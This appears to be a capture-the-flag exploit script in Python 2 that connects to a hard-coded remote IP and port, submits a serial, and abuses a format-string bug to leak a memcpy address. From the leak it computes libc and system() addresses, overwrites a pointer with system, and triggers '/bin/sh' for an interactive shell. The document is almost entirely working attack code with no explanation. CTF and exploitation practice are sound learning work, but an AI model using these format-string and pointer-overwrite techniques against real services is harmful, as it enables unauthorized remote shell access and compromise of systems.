from codez import *

serial = '615066814080' +'ABCD'
serial += pack('Q',0x602040)


#r = xlocal()
r = Remote('175.119.158.133', 23232)
dbg()
r.read(':')
r.write(serial+"\n")
r.read('>>')


r.write('1\n')
r.write('|%17$s|'.ljust(24,'A') + "\xae\x0c" + "\n")
r.read('>>')

r.write("3\n")
r.read('0x')
leak =r.read('!').split('|')[1]
memcpy = unpack('Q',leak.ljust(8,"\x00"))[0]
print hex(memcpy)
libc = memcpy - 133456
print hex(libc)
system = libc + 279504
r.write('1\n')
r.write('/bin/sh #'.ljust(24,'A') + pack('Q',system)[:-1] + "\n")
r.read('>>')
r.read('!')
r.write('2\n')
r.write('0\n')
r.write("3\n")
r.interactive()


#raw_input('e')